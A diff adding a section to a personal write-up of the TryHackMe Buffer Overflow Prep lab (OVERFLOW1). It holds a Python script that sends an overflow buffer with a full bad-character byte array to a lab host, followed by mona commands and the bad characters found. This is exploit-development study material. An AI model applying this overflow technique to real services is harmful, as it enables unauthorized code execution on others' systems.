--- a/TryHackMe/Buffer_Overflow_Prep/1.md
+++ b/TryHackMe/Buffer_Overflow_Prep/1.md
@@ -221,3 +221,58 @@ print()
 #### Creating matching byte array using mona on target
 
 ![image](https://user-images.githubusercontent.com/83407557/185200904-84868e51-3e92-4696-bc2d-5cc6a850a7a2.png)
+
+#### Creating find_bad_chars.py
+
+I update the payload with my byte array
+
+```python
+#!/usr/bin/env python3
+import socket
+
+ip = "10.10.45.178"
+port = 1337
+
+prefix = "OVERFLOW1 "
+offset = 1978
+overflow = "A" * offset
+retn = "BBBB"
+padding = ""
+payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
+postfix = ""
+
+buffer = prefix + overflow + retn + padding + payload + postfix
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+try:
+    s.connect((ip, port))
+    print("Sending evil buffer...")
+    s.send(bytes(buffer + "\r\n", "latin-1"))
+    print("Done!")
+except:
+    print("Could not connect.")
+
+```
+
+After reseting the app and running the above script, I can use mona to compare the byte arrays with `!mona compare -f C:\mona\appname\bytearray.bin -a ESP-address`
+
+Noting esp is 018BFA30
+
+![image](https://user-images.githubusercontent.com/83407557/185204806-4afc2b07-d144-4e7d-8932-6872da3d5060.png)
+
+Then I can run `!mona compare -f C:\mona\oscp\bytearray.bin -a 018BFA30`
+
+![image](https://user-images.githubusercontent.com/83407557/185205254-f46e74e5-562f-4a47-be1d-f2bd0cb18694.png)
+
+Taking note of 07 and remove it from the python scrip, and make a new byte array in mona and run everything again.
+
+I note the new ESP address of 019AFA30, and rerun the mona command with this new address
+
+![image](https://user-images.githubusercontent.com/83407557/185206283-330c39d3-a0f9-4047-aa4e-ffb70ac0a980.png)
+
+It still shows 4 possible, with the first in the array usually corrupting the second, so I remove 2e and a0 from my python script, and from mona's array.bin file.
+
+
+
+
